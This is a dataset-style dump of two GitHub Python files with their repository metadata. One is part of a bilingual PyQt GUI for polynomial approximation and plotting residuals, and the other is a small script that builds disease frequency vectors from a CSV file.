captions = ["Файл вхідних даних", "Файл результатів"]
filelayout = []
self.filelables = []
filelablelayout = QtGui.QVBoxLayout()
filefieldslayout = QtGui.QVBoxLayout()
namedefault = ['input_data.txt', 'out_results.txt']
for i in range(2):
self.filename.append(QtGui.QLineEdit(namedefault[i]))
self.filename[i].setFixedWidth(100)
self.filename[i].setAlignment(QtCore.Qt.AlignLeft)
self.filebuttons.append(QtGui.QPushButton("Обрати"))
self.filebuttons[i].setFixedWidth(60)
filelayout.append(QtGui.QHBoxLayout())
filelayout[i].addWidget(self.filename[i])
self.filelables.append(QtGui.QLabel(captions[i]))
self.filelables[i].setAlignment(QtCore.Qt.AlignLeft)
filelablelayout.addWidget(self.filelables[i])
filelayout[i].addWidget(self.filebuttons[i])
filefieldslayout.addLayout(filelayout[i])
QtCore.QObject.connect(self.filebuttons[0], QtCore.SIGNAL("clicked()"), self.selectInputFile)
QtCore.QObject.connect(self.filebuttons[1], QtCore.SIGNAL("clicked()"), self.selectOutputFile)
self.samlable = QtGui.QLabel("Обсяг вибірки")
self.samlable.setAlignment(QtCore.Qt.AlignLeft)
filelablelayout.addWidget(self.samlable)
filefieldslayout.addWidget(self.samplevolume)
datalayout = QtGui.QHBoxLayout()
datalayout.addLayout(filelablelayout)
datalayout.addLayout(filefieldslayout)
datalayout.insertSpacing(1, 20)
databox = QtGui.QWidget()
databox.setLayout(datalayout)
databox.setSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
self.vectorbox = QtGui.QGroupBox("Розмірності вхідних векторів")
vectorlayout = QtGui.QHBoxLayout()
vectorxlayout = QtGui.QVBoxLayout()
vectorylayout = QtGui.QVBoxLayout()
dimensiondefaults = [2, 2, 3, 4]
self.dimensions = []
self.dimensionslayout = []
for i in range(3):
self.dimensionslayout.append(QtGui.QHBoxLayout())
self.dimensions.append(QtGui.QSpinBox())
self.dimensions[i].setMinimum(0)
self.dimensions[i].setMaximum(100)
self.dimensions[i].setValue(dimensiondefaults[i])
dimensionlab = QtGui.QLabel("x" + str(i + 1))
dimensionlab.setAlignment(QtCore.Qt.AlignLeft)
self.dimensionslayout[i].addWidget(dimensionlab)
self.dimensionslayout[i].addWidget(self.dimensions[i])
vectorxlayout.addLayout(self.dimensionslayout[i])
self.dimensionslayout.append(QtGui.QHBoxLayout())
self.dimensions.append(QtGui.QSpinBox())
self.dimensions[3].setMinimum(1)
self.dimensions[3].setMaximum(100)
self.dimensions[3].setValue(dimensiondefaults[3])
dimensionlab = QtGui.QLabel("y")
dimensionlab.setAlignment(QtCore.Qt.AlignLeft)
self.dimensionslayout[3].addWidget(dimensionlab)
self.dimensionslayout[3].addWidget(self.dimensions[3])
vectorylayout.addLayout(self.dimensionslayout[3])
for i in range(2):
vectorylayout.addWidget(QtGui.QLabel(""))
vectorlayout.addLayout(vectorxlayout)
vectorlayout.addLayout(vectorylayout)
self.vectorbox.setLayout(vectorlayout)
self.vectorbox.setSizePolicy(QtGui.QSizePolicy.Fixed, QtGui.QSizePolicy.Fixed)
inputlayout = QtGui.QHBoxLayout()
inputlayout.addWidget(databox)
inputlayout.addWidget(self.vectorbox)
self.inputbox.setLayout(inputlayout)
self.polinomdegreebox = QtGui.QGroupBox("Степені поліномів")
self.polinomtype = QtGui.QComboBox()
self.polinomtype.addItems(["Чебишева", "Лежандра", "Лаггера", "Ерміта"])
self.polinomdegree = []
self.polinomdegreelayouts = []
polinomdegreelayout = QtGui.QVBoxLayout()
for i in range(3):
self.polinomdegreelayouts.append(QtGui.QHBoxLayout())
self.polinomdegree.append(QtGui.QSpinBox())
self.polinomdegree[i].setMinimum(0)
self.polinomdegree[i].setValue(3+i)#2*(i+1)+2
polinomdegreelab = QtGui.QLabel("x" + str(i + 1))
self.polinomdegreelayouts[i].addWidget(polinomdegreelab)
self.polinomdegreelayouts[i].addWidget(self.polinomdegree[i])
polinomdegreelayout.addLayout(self.polinomdegreelayouts[i])
self.polinomdegreebox.setLayout(polinomdegreelayout)
polinomlayout = QtGui.QVBoxLayout()
polinomtypelayout = QtGui.QHBoxLayout()
self.polinomlab = QtGui.QLabel("Поліноми")
polinomtypelayout.addWidget(self.polinomlab)
polinomtypelayout.addWidget(self.polinomtype)
polinomtypelayout.insertSpacing(1, 20)
polinomlayout.addLayout(polinomtypelayout)
polinomlayout.addWidget(self.polinomdegreebox)
self.polinombox.setLayout(polinomlayout)
self.lambdamethod = []
self.buttonsys1 = QtGui.QRadioButton("за 1єю системою")
self.lambdamethod.append(self.buttonsys1)
self.buttonsys3 = QtGui.QRadioButton("за 3ма системами")
self.lambdamethod.append(self.buttonsys3)
self.lambdamethod[0].setChecked(True)
lambdamethodlayout = QtGui.QVBoxLayout()
for i in self.lambdamethod:
lambdamethodlayout.addWidget(i)
self.lambdabox.setLayout(lambdamethodlayout)
self.graphics = []
self.graphicstab = QtGui.QTabWidget()
graphiclayout = QtGui.QHBoxLayout()
graphiclayout.addWidget(self.graphicstab)
self.graphicbox.setLayout(graphiclayout)
self.gobutton = QtGui.QPushButton("Розв'язати")
QtCore.QObject.connect(self.gobutton, QtCore.SIGNAL("clicked()"), self.start)
methodlayout = QtGui.QVBoxLayout()
methodlayout.addWidget(self.polinombox)
methodlayout.addWidget(self.lambdabox)
methodlayout.addWidget(self.gobutton)
for i in range(4):
methodlayout.addWidget(QtGui.QLabel(""))
graphicmethodlayout = QtGui.QHBoxLayout()
graphicmethodlayout.addLayout(methodlayout)
graphicmethodlayout.addWidget(self.graphicbox)
mainlayout = QtGui.QVBoxLayout()
mainlayout.addLayout(langwinlayout)
mainlayout.addWidget(self.inputbox)
mainlayout.addLayout(graphicmethodlayout)
self.setLayout(mainlayout)
def selectInputFile(self):
path = str(QtGui.QFileDialog.getOpenFileName(None, "Виберіть файл з вхідними даними", QtCore.QDir.currentPath(), "All (*);;Images (*.png *.jpg)"))
if len(path)>0:
self.filename[0].setText(path)
def selectOutputFile(self):
path = str(QtGui.QFileDialog.getOpenFileName(None, "Виберіть файл для вихідних даних", QtCore.QDir.currentPath(), "All (*);;Images (*.png *.jpg)"))
if not path == []:
self.filename[1].setText(path)
def LangChange(self):
##print("LangChanged")
now = self.langwin.currentIndex()
if now == 1:
self.setWindowTitle("Functional dependency resoration")
self.vectorbox.setTitle("Input vectors dimentions")
self.polinombox.setTitle("Polinoms setting")
self.inputbox.setTitle("Input and output data")
self.lambdabox.setTitle("λ Search")
self.graphicbox.setTitle("Graphics")
self.polinomdegreebox.setTitle("Polinom degrees")
self.langlab.setText("Language")
self.filelables[0].setText("Input data file")
self.filelables[1].setText("Results file")
for i in range(2):
self.filebuttons[i].setText("Select")
self.samlable.setText("Sample size")
self.polinomlab.setText("Polinoms of")
self.buttonsys1.setText("with 1 system")
self.buttonsys3.setText("with 3 systems")
self.gobutton.setText("Solve")
for graphic in self.graphics:
graphic.zoombut.setText("Zoom")
graphic.panbut.setText("Pan")
graphic.homebut.setText("Home")
graphic.savebut.setText("Save")
self.polinomtype.clear()
self.polinomtype.addItems(["Chebyshev", "Legendre", "Lagger", "Hermit"])
if now == 0:
self.setWindowTitle("Відновлення функціональної залежності")
self.vectorbox.setTitle("Розмірності вхідних векторів")
self.polinombox.setTitle("Поліноми")
self.inputbox.setTitle("Вхідні та вихідні дані")
self.lambdabox.setTitle("Пошук λ")
self.graphicbox.setTitle("Графіки")
self.polinomdegreebox.setTitle("Степені поліномів")
self.langlab.setText("Мова")
self.filelables[0].setText("Файл вхідних даних")
self.filelables[1].setText("Файл результатів")
for i in range(2):
self.filebuttons[i].setText("Обрати")
self.samlable.setText("Обсяг вибірки")
self.polinomlab.setText("Задання поліномів")
self.buttonsys1.setText("за 1єю системою")
self.buttonsys3.setText("за 3ма системами")
self.gobutton.setText("Розв'язати")
for graphic in self.graphics:
graphic.zoombut.setText("Збільшити")
graphic.panbut.setText("Перемістити")
graphic.homebut.setText("Повністю")
graphic.savebut.setText("Зберегти")
self.polinomtype.clear()
self.polinomtype.addItems(["Чебишева", "Лежандра", "Лаггера", "Ерміта"])
def start(self):
for widget in self.graphics:
widget.hide()
widget.destroy()
self.graphicstab.clear()
dimensions = [self.dimensions[i].value() for i in range(3)]
degrees = [self.polinomdegree[i].value() for i in range(3)]
if (self.lambdamethod[0].isChecked()):
lambda_flag = 0
else:
lambda_flag = 1
mod = Iterator(self.samplevolume.value(), dimensions, self.dimensions[3].value(), self.filename[0].text(), self.polinomtype.currentIndex(), degrees, lambda_flag)
mod.normalization()
n_array = np.arange(float(self.samplevolume.value()))
ydim = self.dimensions[3].value()
for i in range(ydim):
self.graphics.append(PlotManager(self))
self.graphicstab.addTab(self.graphics[i], 'Y'+str(i))
for i in range(ydim):
self.graphics.append(PlotManager(self))
self.graphicstab.addTab(self.graphics[ydim+i], 'res'+str(i))
mod.approximate(self.filename[1].text())
mod.denormalization()
for i in range(ydim):
self.graphics[i].ax.clear()
self.graphics[i].ax.set_facecolor('#dddddd')
self.graphics[i].ax.plot(n_array, mod.y[i], 'b', n_array, mod.y_cnt[i], '#D53206') ##0707FA082A6A
self.graphics[i].canvas.draw()
for i in range(ydim):
resid = (mod.y[i] - mod.y_cnt[i])/max(mod.y[i])
for j in range(len(resid)):
resid[j] = np.fabs(resid[j])
print(mod.y[i], mod.y_cnt[i], resid)
self.graphics[ydim+i].ax.clear()
self.graphics[ydim+i].ax.set_facecolor('#dddddd')
self.graphics[ydim+i].ax.plot(n_array, resid, '#0D6806')
self.graphics[ydim+i].canvas.draw()
app = QtGui.QApplication(sys.argv)
window = mainWindow()
window.show()
sys.exit(app.exec_())
|
[
"noreply@github.com"
] |
ozhenchuk.noreply@github.com
|
4c5c34eeb833bb131f5c7d69cd376b51d860a327
|
5c760034921788b8d9e92a9c78f210127e4a6f56
|
/computeDiseaseVec.py
|
1e20bc183c04d65bdf8f75c316df7b041cd6a76d
|
[] |
no_license
|
DiliSimon/HopHacks19
|
80c6d1a99aa3586a94f5087aa46c0f2beb72ee5d
|
afd1579e3f4fde8a3abd468f97af67b99588e8bb
|
refs/heads/master
| 2021-02-10T23:36:00.186011
| 2020-03-02T17:22:01
| 2020-03-02T17:22:01
| 244,429,699
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 938
|
py
|
from defaultlist import defaultlist
dlist = []
with open('disease_list') as f:
for l in f:
dlist.append(l.strip('\n'))
dNum = defaultlist(int)
with open('disease_vector.csv') as f:
for l in f:
dname = l.split('[')[0][:-1]
indexOfDisease = dlist.index(dname)
dNum[indexOfDisease] += 1
dveclist = defaultlist(list)
with open('disease_vector.csv') as f:
for l in f:
dname = l.split('[')[0][:-1]
indexOfDisease = dlist.index(dname)
dveclist[indexOfDisease] = defaultlist(int)
scorelist = l.split('[')[1].split(',')
for ind in range(len(scorelist)):
if ind == len(scorelist)-1:
scorelist[ind]=scorelist[ind][:-2]
if not int(scorelist[ind]) == 0:
dveclist[indexOfDisease][ind] += 1/dNum[indexOfDisease]
print(dveclist)
for ind in range(len(dveclist)):
if dveclist[ind] == []:
print(ind)
|
[
"Gtingwen@outlook.com"
] |
Gtingwen@outlook.com
|
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.